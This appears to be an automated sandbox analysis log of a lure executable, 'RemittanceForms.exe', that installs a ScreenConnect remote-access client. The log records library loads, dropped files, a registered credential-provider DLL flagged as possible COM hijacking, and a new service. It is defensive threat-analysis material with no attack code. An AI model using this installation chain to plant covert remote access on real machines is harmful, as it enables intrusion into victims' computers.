Source: C:\Windows\System32\svchost.exe	Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: amsi.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: userenv.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: gpapi.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: edputil.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: netutils.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: slc.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: sppc.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Window found: window name: SysTabControl32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Downloads\RemittanceForms.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Persistence and Installation Behavior

Possible COM Object hijacking

Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll	COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE165.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\e9437aa8-b71a-4549-a9b9-7890db2aa232.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\05921837-fe71-4e65-9600-6a9e2f65e922.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\Downloads\Unconfirmed 804247.crdownload	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\MSIE165.tmp

Jump to dropped file

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
